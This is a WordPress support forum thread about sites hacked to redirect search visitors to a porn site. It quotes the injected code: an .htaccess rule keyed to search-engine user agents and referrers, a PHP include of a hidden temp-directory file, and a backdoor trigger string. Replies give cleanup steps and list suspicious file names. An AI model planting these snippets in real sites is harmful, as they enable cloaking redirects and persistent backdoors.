HTACCESS and Index.php hacked

raymondthexton
(@raymondthexton)

9 years, 7 months ago
Hi Everyone,

Good Day,

i recently noticed that every time i search my sites at Google my sites redirect to a porn site.

then i checked my files my HTACCESS and INDEX files have been injected by a code.

HTACCESS CODE injected:
```
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
```
INDEX.php

error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>
I removed alot of files and codes. installed and run Wordfence everyday but still the codes pops up everyday.

is there any way i can delete all of these permanently?

Thanks in advance.
- This topic was modified 9 years, 7 months ago by Steven Stern (sterndata). Reason: moved from "hacks" to "troubleshooting"
- This topic was modified 9 years, 7 months ago by Steven Stern (sterndata). Reason: removed blockquotes and added backticks

Viewing 10 replies - 1 through 10 (of 10 total)

Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

9 years, 7 months ago

Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

Thread Starter raymondthexton
(@raymondthexton)

9 years, 7 months ago

Thanks for the immediate response steve.

also will you be able to tell me if this code is hacked as well?

from this file wp-includes/general-template.php:

strpos($_SERVER[‘REQUEST_URI’], ‘gimmeyourfuckingtemplate’)”

Thread Starter raymondthexton
(@raymondthexton)

9 years, 7 months ago

Hi,

*i am new at all of these. i am not a hard core programmer. 😉

I need some help with preventing php code injection on my core files.

is there any way i can prevent it?

The Hack Repair Guy
(@tvcnet)

9 years, 7 months ago

Yes this code above is part of the hackers set of exploits.

After ensuring all passwords are changes, and all extra Admin Users are removed or downgraded, you’ll need to search for all .htaccess files within your account. It’s likely there is a .htaccess file above your public_html as well as in many of your directories.

Start by searching through all files on your site for this text:
google|yahoo|msn|aol|bing

And then:
SESS_48cd7517d21176f980daa5502d9efb31
Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

9 years, 7 months ago
Please read the steps in the links I provided. Your system is compromised and you cannot trust anything on it.

You need to start working your way through these resources:
Additional Resources:
Thread Starter raymondthexton
(@raymondthexton)

9 years, 7 months ago
Hi Anjoid

the problem is some one is handling the accounts before i did. so no one told me it was that bad.

what im currently doing is run Wordfence twice a day. as well as checking manually my server for code injections.

i have also used what Steve recommended above.

my Hosting is GoDaddy.

Thanks
– Ray
- This reply was modified 9 years, 7 months ago by raymondthexton.
anjoid
(@anjoid)

9 years, 7 months ago
I’m still facing the issue as well on my bluehost server. I personally believe the shared server was affected and is continuing to cause the issue.

Here’s what I’ve done

– Updated and cleaned all .htaccess files and changed permissions to 444
– Updated and cleaned all index.php files and changed permissions 644
– Removed malicious java from header.php and changed permissions 644
– Updated wordpress and all plugins

And after all that the same malicious code came back within hours.

My overall solution was switching to a new host. I decided to go with ipage and I’ve started to move all my sites over. After 48 hours the files on ipage have not been compromised where as the exact clean files back on bluehost were compromised within 1 hour.

Hope that helps! If anyone else has found a solution or has any input please share.
- This reply was modified 9 years, 7 months ago by anjoid.
Thread Starter raymondthexton
(@raymondthexton)

9 years, 7 months ago

Hi Guys,

i might have deleted something on my server that helped dealing with the code injection. but the problem is i cant remember which file i removed. coz i have deleted like 200 suspected files in a day.

but i still scanning for malware twice a day. to be sure.

@sanchitgupta: i currently managing 5 sites on godaddy. but someone was handling it before me. i would suggest to move server like what Anjoid did. but you will have to create a back up first and scan it with an antivirus just to be safe and make sure no suspicious code before you upload.

Thanks
lupsescu
(@lupsescu)

9 years, 6 months ago
the same problem here..with godaddy hosting .. but I found something encrypted and we can decrypt with unphp.net … here are one of this files … http://lupsescu.com/malware.zip and just take a look in your /tmp directories … there this thing stores lots of SESS_ files and sess_ thanks and hope we can repais this shit … scan your web server for this files : and folders
hostdata3.php
post.php
_MACOSX/
meta/
confg.php
context.php
cros.php
onleinw.php
wpcallback.php
- This reply was modified 9 years, 6 months ago by lupsescu.
wns777
(@wns777)

9 years, 6 months ago

Same problem. Fixed. Thanks God.

After tracing error log and access log, I found and deleted some php files which do not belong to my site, in wp-content/plugins folder, named akismet.php, cron.php, cuckoldry.php, and stonework.php.